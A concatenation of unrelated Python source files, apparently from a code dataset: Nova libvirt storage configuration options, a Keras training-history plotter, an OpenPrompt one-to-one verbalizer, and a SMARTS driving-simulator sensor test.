libvirt_volume_opts = [
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help="""
Protocols listed here will be accessed directly from QEMU.
If gluster is present in qemu_allowed_storage_drivers, the glusterfs backend will
pass a disk configuration to QEMU. This allows QEMU to access the volume using
libgfapi rather than mounting GlusterFS via fuse.
Possible values:
* [gluster]
"""),
cfg.BoolOpt('volume_use_multipath',
default=False,
deprecated_name='iscsi_use_multipath',
help="""
Use multipath connection of the iSCSI or FC volume.
Volumes can be connected in LibVirt as multipath devices. This will
provide high availability and fault tolerance.
""")
]
libvirt_volume_aoe_opts = [
cfg.IntOpt('num_aoe_discover_tries',
default=3,
help="""
Number of times to rediscover AoE target to find volume.
Nova provides support for block storage attaching to hosts via AOE (ATA over
Ethernet). This option allows the user to specify the maximum number of retry
attempts that can be made to discover the AoE device.
""")
]
libvirt_volume_glusterfs_opts = [
cfg.StrOpt('glusterfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Absolute path to the directory where the glusterfs volume is mounted on the
compute node.
""")
]
# TODO(sneti): This config option is also used for other protocols like
# fibrechannel, scaleio, disco. So this should be renamed to
# num_volume_scan_tries
libvirt_volume_iscsi_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help="""
Number of times to scan iSCSI target to find volume.
"""),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help="""
The iSCSI transport iface to use to connect to target in case offload support
is desired.
Default format is of the form <transport_name>.<hwaddress> where
<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, cxgb4i, qla4xxx, ocs) and
<hwaddress> is the MAC address of the interface and can be generated via the
iscsiadm -m iface command. Do not confuse the iscsi_iface parameter to be
provided here with the actual transport name.
""")
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
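# Hedged illustration (not part of the original module): an example of the
# <transport_name>.<hwaddress> format described for ``iscsi_iface`` above;
# the MAC address is a placeholder that would normally be taken from the
# output of ``iscsiadm -m iface``.
#
#     [libvirt]
#     iscsi_iface = bnx2i.00:05:b5:d2:a0:c2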
libvirt_volume_iser_opts = [
cfg.IntOpt('num_iser_scan_tries',
default=5,
help="""
Number of times to scan iSER target to find volume.
iSER is a server network protocol that extends iSCSI protocol to use Remote
Direct Memory Access (RDMA). This option allows the user to specify the maximum
number of scan attempts that can be made to find iSER volume.
"""),
cfg.BoolOpt('iser_use_multipath',
default=False,
help="""
Use multipath connection of the iSER volume.
iSER volumes can be connected as multipath devices. This will provide high
availability and fault tolerance.
""")
]
libvirt_volume_net_opts = [
cfg.StrOpt('rbd_user',
help="""
The RADOS client name for accessing rbd(RADOS Block Devices) volumes.
Libvirt will refer to this user when connecting and authenticating with
the Ceph RBD server.
"""),
cfg.StrOpt('rbd_secret_uuid',
help="""
The libvirt UUID of the secret for the rbd_user volumes.
"""),
]
libvirt_volume_nfs_opts = [
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the NFS volume is mounted on the compute node.
The default is 'mnt' directory of the location where nova's Python module
is installed.
NFS provides shared storage for the OpenStack Block Storage service.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('nfs_mount_options',
help="""
Mount options passed to the NFS client. See the nfs man page
for details.
Mount options controls the way the filesystem is mounted and how the
NFS client behaves when accessing files on this mount point.
Possible values:
* Any string representing mount options separated by commas.
* Example string: vers=3,lookupcache=pos
"""),
]
libvirt_volume_quobyte_opts = [
cfg.StrOpt('quobyte_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Quobyte volume is mounted on the compute node.
Nova supports the Quobyte volume driver, which enables storing Block Storage
service volumes on a Quobyte storage back end. This option specifies the
path of the directory where the Quobyte volume is mounted.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('quobyte_client_cfg',
help='Path to a Quobyte Client configuration file.'),
]
libvirt_volume_scality_opts = [
cfg.StrOpt('scality_sofs_config',
help="""
Path or URL to Scality SOFS(Scale-Out File Server) configuration file.
The Scality SOFS provides OpenStack users the option of storing their
data on a high capacity, replicated, highly available Scality Ring object
storage cluster.
"""),
cfg.StrOpt('scality_sofs_mount_point',
default='$state_path/scality',
help="""
Base dir where Scality SOFS shall be mounted.
The Scality volume driver in Nova mounts SOFS and lets the hypervisor access
the volumes.
Possible values:
* $state_path/scality where state_path is a config option that specifies
the top-level directory for maintaining nova's state or Any string
containing the full directory path.
"""),
]
libvirt_volume_smbfs_opts = [
cfg.StrOpt('smbfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the SMBFS shares are mounted on the compute node.
"""),
cfg.StrOpt('smbfs_mount_options',
default='',
help="""
Mount options passed to the SMBFS client.
Provide SMBFS options as a single string containing all parameters.
See mount.cifs man page for details. Note that the libvirt-qemu ``uid``
and ``gid`` must be specified.
"""),
]
libvirt_remotefs_opts = [
cfg.StrOpt('remote_filesystem_transport',
default='ssh',
choices=('ssh', 'rsync'),
help="""
libvirt's transport method for remote file operations.
Because libvirt cannot use RPC to copy files over the network to/from other
compute nodes, another method must be used for:
* creating directory on remote host
* creating file on remote host
* removing file from remote host
* copying file to remote host
""")
]
libvirt_volume_vzstorage_opts = [
cfg.StrOpt('vzstorage_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Virtuozzo Storage clusters are mounted on the compute
node.
This option defines non-standard mountpoint for Vzstorage cluster.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_user',
default='stack',
help="""
Mount owner user name.
This option defines the owner user of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_group',
default='qemu',
help="""
Mount owner group name.
This option defines the owner group of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_perms',
default='0770',
help="""
Mount access mode.
This option defines the access bits of Vzstorage cluster mountpoint,
in the format similar to one of chmod(1) utility, like this: 0770.
It consists of one to four digits ranging from 0 to 7, with missing
lead digits assumed to be 0's.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_log_path',
default='/var/log/pstorage/%(cluster_name)s/nova.log.gz',
help="""
Path to vzstorage client log.
This option defines the log of cluster operations,
it should include "%(cluster_name)s" template to separate
logs from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed logging options.
"""
),
cfg.StrOpt('vzstorage_cache_path',
default=None,
help="""
Path to the SSD cache file.
You can attach an SSD drive to a client and configure the drive to store
a local cache of frequently accessed data. By having a local cache on a
client's SSD drive, you can increase the overall cluster performance by
up to 10 or more times.
WARNING! There are a lot of SSD models which are not server grade and
may lose an arbitrary set of data changes on power loss.
Such SSDs should not be used in Vstorage and are dangerous as they may lead
to data corruption and inconsistencies. Please consult the manual
on which SSD models are known to be safe or verify it using
vstorage-hwflush-check(1) utility.
This option defines the path which should include "%(cluster_name)s"
template to separate caches from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed cache options.
"""
),
cfg.ListOpt('vzstorage_mount_opts',
default=[],
help="""
Extra mount options for pstorage-mount
For full description of them, see
https://static.openvz.org/vz-man/man1/pstorage-mount.1.gz.html
Format is a python string representation of arguments list, like:
"[\'-v\', \'-R\', \'500\']"
Shouldn\'t include -c, -l, -C, -u, -g and -m as those have
explicit vzstorage_* options.
Related options:
* All other vzstorage_* options
"""
),
]
ALL_OPTS = list(itertools.chain(
libvirt_general_opts,
libvirt_imagebackend_opts,
libvirt_imagecache_opts,
libvirt_lvm_opts,
libvirt_utils_opts,
libvirt_vif_opts,
libvirt_volume_opts,
libvirt_volume_aoe_opts,
libvirt_volume_glusterfs_opts,
libvirt_volume_iscsi_opts,
libvirt_volume_iser_opts,
libvirt_volume_net_opts,
libvirt_volume_nfs_opts,
libvirt_volume_quobyte_opts,
libvirt_volume_scality_opts,
libvirt_volume_smbfs_opts,
libvirt_remotefs_opts,
libvirt_volume_vzstorage_opts,
))
def register_opts(conf):
conf.register_group(libvirt_group)
conf.register_opts(ALL_OPTS, group=libvirt_group)
def list_opts():
return {libvirt_group: ALL_OPTS}
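# Hedged usage sketch (not part of the original module, assuming the standard
# oslo.config flow): once ``register_opts`` has been called on a ConfigOpts
# instance, every option defined above is reachable under the ``libvirt``
# group of that instance.
#
#     from oslo_config import cfg
#
#     CONF = cfg.CONF
#     register_opts(CONF)
#     use_post_copy = CONF.libvirt.live_migration_permit_post_copy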
| 35.516729 | 79 | 0.690365 | [
"Apache-2.0"
] | jeckxie/gxzw-nova | nova/conf/libvirt.py | 38,216 | Python |
import re
import matplotlib.pyplot as plt
from DatasetHandler.ContentSupport import isNotNone, isNone
from Plotter.SavePlots import PlotSaver
class HistoryPlotter(object):
"""
    This class provides a history plotting pipeline using matplotlib.
"""
    _using_history:bool = False # This is for a later implemented part of the tool
_path:str = None
_history = None
_history_keys:dict = None
_history_keys_list:list = None
_losses:list = None
_val_losses:list = None
_acc_stdcc_list:list = None
_val_acc_stdcc_list:list = None
_acc_topkcc_list:list = None
_val_acc_topkcc_list:list = None
_learning_rates:list = None
_epochs:int = 0
def __init__(self, model_description:str, path:str = None, history = None, save_it:bool = True, new_style:bool = False):
"""
The class constructor.
Attention: File history plotting is not yet implemented!
:param model_description:str: something to name the image unique and is also the file name
:param path:str: path of a file containing a history
:param history: a history
:param save_it:bool: save the plot instead of showing
:param new_style:bool: desired matplot lib standard or new style
"""
try:
self._model_description = model_description if isNotNone(model_description) else 'undescribed_model'
if isNotNone(path) and isNone(history):
self._path:str = path
self._using_history = False
if isNotNone(history):
self._history = history
self._history_keys = history.history.keys()
self._history_keys_list = list(self._history_keys)
self._using_history = True
self._new_style:bool = new_style
self._save_it:bool = save_it
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.Constructor]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def PlotHistory(self):
"""
        This method allows plotting a history directly from a keras history object.
        Plotting from a log file is not yet implemented!
"""
try:
if self._using_history:
if self._new_style:
self.CollectFromHistory()
self.DirectPlotHistory()
else:
self.OldPlotHistory()
#TODO: Log file history plotting is not yet implemented
#else:
# self.PlotHistoryFromLog()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.PlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectAccFromHistory(self, name:str):
"""
        This method collects the accuracy data from the history into 2 lists.
:param name:str: name of the used acc metric
"""
try:
acc_list:list = []
val_acc_list:list = []
name = re.sub('val_', '', name)
if name in self._history_keys:
acc_list = [s for s in self._history_keys if (name == s)]
val_acc_list = [s for s in self._history_keys if ('val_'+name == s)]
if isNotNone(acc_list) and isNotNone(val_acc_list):
self._history_keys_list.remove(name)
self._history_keys_list.remove('val_'+name)
print("Found accuracy metrics in history!")
return acc_list, val_acc_list
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectAccFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLossFromHistory(self):
"""
        This method collects the loss metric data from the history.
"""
try:
loss_val:str = 'loss'
if loss_val in self._history_keys:
self._losses = [s for s in self._history_keys if (loss_val == s)]
self._val_losses = [s for s in self._history_keys if ('val'+loss_val in s)]
self._epochs = len(self._history.epoch)
if len(self._losses) == 0 or len(self._val_losses) == 0:
print('Loss is missing in history')
return
if isNotNone(self._losses) and isNotNone(self._val_losses):
self._history_keys_list.remove(loss_val)
self._history_keys_list.remove('val_'+loss_val)
print("Found losses in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLossFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLearningRatesFromHistory(self):
"""
        This method collects the learning rate metric data from the history.
"""
try:
lr_val:str = 'lr'
if lr_val in self._history_keys:
self._learning_rates = [s for s in self._history_keys if (lr_val == s)]
if isNotNone(self._learning_rates):
self._history_keys_list.remove(lr_val)
print("Found learning rates in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLearningRatesFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectFromHistory(self):
"""
        This method collects all necessary training information from the history.
"""
if self._using_history:
try:
print("Collect losses from history...")
self.CollectLossFromHistory()
print("Collect learning rate from history...")
self.CollectLearningRatesFromHistory()
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_stdcc_list, self._val_acc_stdcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_topkcc_list, self._val_acc_topkcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
else:
print('No history initialized!')
def DirectPlotHistory(self):
"""
        This method helps to plot a keras history containing losses, accuracy and possibly the learning rates.
"""
try:
fig_num:int = 1
## Loss
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot',
train_val_lists = [self._losses, self._val_losses])
fig_num += 1
## Top k Categorical Crossentropy
if ('top_k_categorical_accuracy' in self._history_keys) and isNotNone(self._acc_topkcc_list) and isNotNone(self._val_acc_topkcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot',
train_val_lists = [self._acc_topkcc_list, self._val_acc_topkcc_list])
fig_num += 1
## Categorical Crossentropy
if 'categorical_accuracy' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
## General
if 'acc' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
if 'lr' in self._history_keys and isNotNone(self._learning_rates):
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.DirectPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def OldPlotHistory(self):
"""
        This method plots the history in the old way.
"""
try:
fig_num:int = 1
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot')
fig_num += 1
if 'acc' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'acc',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot')
fig_num += 1
if 'top_k_categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot')
fig_num += 1
if 'categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot')
fig_num += 1
if 'lr' in self._history_keys:
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.OldPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def AccOrLossPlot(self, fig_num:int, title:str, metric:str, axis_labels:list = ['train', 'validation'], history_labels:list = ['Metric', 'Epoch'], extender:str = '_epoch_plot', train_val_lists:list = None):
"""
        This method wraps the plot creation for a single metric of the keras training history.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
:param train_val_lists:list: a list containing the train and validation list of a defined metric
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
if metric == 'loss': plt.title(self.CalcResultLoss(history=self._history))
else: plt.title(self.CalcResultAccuracy(history=self._history, metric=metric))
if not self._new_style:
plt.plot(self._history.history[metric], color='blue', label=axis_labels[0])
plt.plot(self._history.history['val_' + metric], color='orange', label=axis_labels[1])
else:
                if (train_val_lists is not None) and (len(train_val_lists) == 2):
                    for l in train_val_lists[0]: plt.plot(range(self._epochs), self._history.history[l], color='b', label='Training ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
                    for l in train_val_lists[1]: plt.plot(range(self._epochs), self._history.history[l], color='g', label='Validation ' + metric + ' (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='lower right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender=extender)
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.AccOrLossPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def LearningPlot(self, fig_num:int, title:str = 'Model Learning Rate', metric:str = 'lr', axis_labels:list = ['train', 'validation'], history_labels:list = ['Learning Rate', 'Epoch'], extender:str = 'learning_rate_epoch_plot'):
"""
        This method plots the learning rate curve.
:param fig_num:int: figure number
:param title:str: figure title
:param metric:str: desired metric
:param axis_labels:list: axis labels
:param history_labels:list: history labels
:param extender:str: plot file name extender
"""
try:
figure = plt.figure(fig_num)
plt.suptitle(title, fontsize=14, fontweight='bold')
plt.title(self.CalcResultLearnRate(history=self._history))
if not self._new_style:
plt.plot(self._history.history[metric], color='red', label='learning rate')
else:
                for l in self._learning_rates: plt.plot(range(self._epochs), self._history.history[l], color='r', label='Learning Rate (' + str(format(self._history.history[l][-1],'.5f'))+')')
plt.ylabel(history_labels[0])
plt.xlabel(history_labels[1])
plt.legend(axis_labels, loc='upper right')
if self._save_it:
PlotSaver(self._model_description, figure).SavePyPlotToFile(extender='learning_rate_epoch_plot')
else:
plt.show()
figure.clf()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.LearningPlot]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultAccuracy(self, history, metric:str = 'acc'):
"""
        This method shows the training accuracy results.
:param history: history of the training
"""
try:
return "Training accuracy: %.2f%% / Validation accuracy: %.2f%%" % (100*history.history[metric][-1], 100*history.history['val_'+metric][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultAccuracy]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLoss(self, history):
"""
        This method shows the training loss results.
:param history: history of the training
"""
try:
return 'Training loss: '+ str(history.history['loss'][-1])[:-6] +' / Validation loss: ' + str(history.history['val_loss'][-1])[:-6]
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLoss]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CalcResultLearnRate(self, history):
"""
        This method shows the training learning rate.
:param history: history of the training
"""
try:
return 'Training Learn Rate: '+ str(history.history['lr'][-1])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CalcResultLearnRate]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
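if __name__ == "__main__":
    # Hedged usage sketch (not part of the original class): a tiny stand-in
    # for a Keras History object so the plotting path can be exercised
    # without training a real model. Metric names and values are made up.
    class _FakeHistory:
        def __init__(self):
            self.epoch = list(range(5))
            self.history = {
                "loss": [1.00, 0.80, 0.60, 0.50, 0.45],
                "val_loss": [1.10, 0.90, 0.70, 0.60, 0.55],
                "acc": [0.50, 0.60, 0.70, 0.75, 0.80],
                "val_acc": [0.45, 0.55, 0.65, 0.70, 0.72],
                "lr": [0.01, 0.01, 0.005, 0.005, 0.001],
            }

    # save_it=False shows the figures instead of writing them to disk.
    HistoryPlotter(model_description="demo_model",
                   history=_FakeHistory(),
                   save_it=False).PlotHistory()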
| 48.365979 | 231 | 0.553981 | [
"MIT"
] | ReleasedBrainiac/GraphToSequenceNN | Scripts/Plotter/PlotHistory.py | 18,766 | Python |
import json
from transformers.tokenization_utils import PreTrainedTokenizer
from yacs.config import CfgNode
from openprompt.data_utils import InputFeatures
import re
from openprompt import Verbalizer
from typing import *
import torch
import torch.nn as nn
import torch.nn.functional as F
from openprompt.utils.logging import logger
class One2oneVerbalizer(Verbalizer):
r"""
    The basic manually defined verbalizer class. This class is inherited from the :obj:`Verbalizer` class.
    This class restricts the use of label words to one word per label. For a verbalizer with fewer constraints,
    please use the basic ManualVerbalizer.
Args:
tokenizer (:obj:`PreTrainedTokenizer`): The tokenizer of the current pre-trained model to point out the vocabulary.
classes (:obj:`classes`): The classes (or labels) of the current task.
num_classes (:obj:`int`): Optional. The number of classes of the verbalizer. Only one of `classes` and `num_classes` should be used.
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer. (used in PLMs like RoBERTa, which is sensitive to prefix space)
multi_token_handler (:obj:`str`, optional): The handling strategy for multiple tokens produced by the tokenizer.
post_log_softmax (:obj:`bool`, optional): Whether to apply log softmax post processing on label_logits. Default to True.
"""
def __init__(self,
tokenizer: PreTrainedTokenizer,
num_classes: Optional[int] = None,
classes: Optional[List] = None,
label_words: Optional[Union[Sequence[str], Mapping[str, str]]] = None,
prefix: Optional[str] = " ",
multi_token_handler: Optional[str] = "first",
post_log_softmax: Optional[bool] = True,
):
super().__init__(tokenizer=tokenizer, num_classes=num_classes, classes=classes)
self.prefix = prefix
self.multi_token_handler = multi_token_handler
self.label_words = label_words
self.post_log_softmax = post_log_softmax
def on_label_words_set(self):
super().on_label_words_set()
self.label_words = self.add_prefix(self.label_words, self.prefix)
self.generate_parameters()
@staticmethod
def add_prefix(label_words, prefix):
r"""Add prefix to label words. For example, if a label words is in the middle of a template,
the prefix should be ``' '``.
Args:
label_words (:obj:`Union[Sequence[str], Mapping[str, str]]`, optional): The label words that are projected by the labels.
prefix (:obj:`str`, optional): The prefix string of the verbalizer.
Returns:
:obj:`Sequence[str]`: New label words with prefix.
"""
new_label_words = []
if isinstance(label_words[0], list):
assert max([len(w) for w in label_words]) == 1, "Providing multiple label words, you should use other verbalizers instead."
label_words = [w[0] for w in label_words]
for word in label_words:
if word.startswith("<!>"):
new_label_words.append(word.split("<!>")[1])
else:
new_label_words.append(prefix + word)
return new_label_words
def generate_parameters(self) -> List:
r"""In basic manual template, the parameters are generated from label words directly.
In this implementation, the label_words should not be tokenized into more than one token.
"""
words_ids = []
for word in self.label_words:
word_ids = self.tokenizer.encode(word, add_special_tokens=False)
if len(word_ids) > 1:
logger.warning("Word {} is split into multiple tokens: {}. \
If this is not what you expect, try using another word for this verbalizer" \
.format(word, self.tokenizer.convert_ids_to_tokens(word_ids)))
words_ids.append(word_ids)
max_len = max([len(ids) for ids in words_ids])
words_ids_mask = [[1]*len(ids) + [0]*(max_len-len(ids)) for ids in words_ids]
words_ids = [ids+[0]*(max_len-len(ids)) for ids in words_ids]
words_ids_tensor = torch.tensor(words_ids)
words_ids_mask = torch.tensor(words_ids_mask)
self.label_words_ids = nn.Parameter(words_ids_tensor, requires_grad=False)
self.label_words_mask = nn.Parameter(words_ids_mask, requires_grad=False)
def project(self,
logits: torch.Tensor,
**kwargs,
) -> torch.Tensor:
r"""
Project the labels, the return value is the normalized (sum to 1) probs of label words.
Args:
            logits (:obj:`torch.Tensor`): The original logits of label words.
Returns:
:obj:`torch.Tensor`: The normalized logits of label words
"""
label_words_logits = logits[:, self.label_words_ids]
label_words_logits = self.handle_multi_token(label_words_logits, self.label_words_mask)
return label_words_logits
def process_logits(self, logits: torch.Tensor, **kwargs):
r"""A whole framework to process the original logits over the vocabulary, which contains four steps:
(1) Project the logits into logits of label words
if self.post_log_softmax is True:
(2) Normalize over all label words
(3) Calibrate (optional)
Args:
            logits (:obj:`torch.Tensor`): The original logits.
Returns:
(:obj:`torch.Tensor`): The final processed logits over the label words set.
"""
# project
label_words_logits = self.project(logits, **kwargs) #Output: (batch_size, num_classes) or (batch_size, num_classes, num_label_words_per_label)
if self.post_log_softmax:
# normalize
label_words_probs = self.normalize(label_words_logits)
# calibrate
if hasattr(self, "_calibrate_logits") and self._calibrate_logits is not None:
label_words_probs = self.calibrate(label_words_probs=label_words_probs)
# convert to logits
label_words_logits = torch.log(label_words_probs+1e-15)
return label_words_logits
def normalize(self, logits: torch.Tensor) -> torch.Tensor:
"""
Given logits regarding the entire vocabulary, return the probs over the label words set.
Args:
logits (:obj:`Tensor`): The logits over the entire vocabulary.
Returns:
:obj:`Tensor`: The logits over the label words set.
"""
batch_size = logits.shape[0]
return F.softmax(logits.reshape(batch_size, -1), dim=-1).reshape(*logits.shape)
def calibrate(self, label_words_probs: torch.Tensor, **kwargs) -> torch.Tensor:
r"""
Args:
label_words_probs (:obj:`torch.Tensor`): The probability distribution of the label words with the shape of [``batch_size``, ``num_classes``, ``num_label_words_per_class``]
Returns:
:obj:`torch.Tensor`: The calibrated probability of label words.
"""
shape = label_words_probs.shape
assert self._calibrate_logits.dim() == 1, "self._calibrate_logits are not 1-d tensor"
calibrate_label_words_probs = self.normalize(self.project(self._calibrate_logits.unsqueeze(0), **kwargs))
assert calibrate_label_words_probs.shape[1:] == label_words_probs.shape[1:] \
and calibrate_label_words_probs.shape[0]==1, "shape not match"
label_words_probs /= (calibrate_label_words_probs+1e-15)
# normalize # TODO Test the performance
norm = label_words_probs.reshape(shape[0], -1).sum(dim=-1,keepdim=True) # TODO Test the performance of detaching()
label_words_probs /= norm
return label_words_probs
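# Hedged usage sketch (not part of the original class): wiring the verbalizer
# to a HuggingFace tokenizer with exactly one label word per class. The model
# name and label words below are arbitrary examples.
#
#     from transformers import AutoTokenizer
#
#     tokenizer = AutoTokenizer.from_pretrained("bert-base-cased")
#     verbalizer = One2oneVerbalizer(tokenizer=tokenizer,
#                                    classes=["negative", "positive"],
#                                    label_words=["terrible", "great"])
#     # ``logits_at_mask`` would be the PLM logits at the <mask> position,
#     # shape (batch_size, vocab_size); the result has shape
#     # (batch_size, num_classes).
#     label_logits = verbalizer.process_logits(logits_at_mask)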
| 42.146597 | 183 | 0.652422 | [
"Apache-2.0"
] | BIT-ENGD/OpenPrompt | openprompt/prompts/one2one_verbalizer.py | 8,050 | Python |
# MIT License
#
# Copyright (C) 2021. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from unittest import mock
import numpy as np
import pytest
from helpers.scenario import temp_scenario
from smarts.core.agent_interface import AgentInterface
from smarts.core.coordinates import Heading, Pose
from smarts.core.plan import Plan
from smarts.core.scenario import Scenario
from smarts.core.sensors import DrivenPathSensor, WaypointsSensor
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
AGENT_ID = "Agent-007"
def test_driven_path_sensor():
vehicle = mock.Mock()
sim = mock.Mock()
max_path_length = 5
sensor = DrivenPathSensor(vehicle, max_path_length=max_path_length)
positions = [(x, 0, 0) for x in range(0, 100, 10)]
sim_times = list(range(0, 50, 5))
for idx, (position, sim_time) in enumerate(zip(positions, sim_times)):
sim.elapsed_sim_time = sim_time
vehicle.position = position
sensor.track_latest_driven_path(sim)
if idx >= 3:
assert sensor.distance_travelled(sim, last_n_steps=3) == 30
assert sensor.distance_travelled(sim, last_n_seconds=10) == 20
assert len(sensor()) <= max_path_length
sensor.teardown()
@pytest.fixture
def scenarios():
with temp_scenario(name="straight", map="maps/6lane.net.xml") as scenario_root:
ego_missions = [
t.Mission(
t.Route(
begin=("edge-west-WE", 0, 10),
end=("edge-east-WE", 0, "max"),
)
),
]
gen_scenario(
t.Scenario(ego_missions=ego_missions),
output_dir=scenario_root,
)
